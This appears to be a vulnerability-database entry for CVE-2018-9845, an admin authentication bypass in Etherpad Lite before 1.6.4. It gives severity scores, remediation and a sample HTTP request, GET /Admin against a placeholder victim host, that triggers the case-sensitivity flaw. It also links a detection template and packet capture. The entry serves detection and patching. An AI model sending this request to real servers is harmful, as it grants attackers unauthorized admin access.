🔙 목록으로 돌아가기

CVE-2018-9845: Etherpad Lite <1.6.4 - Admin Authentication Bypass

TitleEtherpad Lite <1.6.4 - Admin Authentication Bypass
Authorphilippedelteil
SeverityCritical
ImpactAn attacker can bypass the admin authentication and gain unauthorized access to the admin panel.
RemediationUpgrade to Etherpad Lite version 1.6.4 or later to fix the vulnerability.
CVSS Score9.8
EPSS Score0.65759
CVE IDCVE-2018-9845
CWE IDCWE-178
Tags cve2018 cve etherpad auth-bypass vuln

🔍 Vulnerability Description

Etherpad Lite before 1.6.4 is exploitable for admin access.

🌐 HTTP Request

GET /Admin HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-9845.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-9845.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A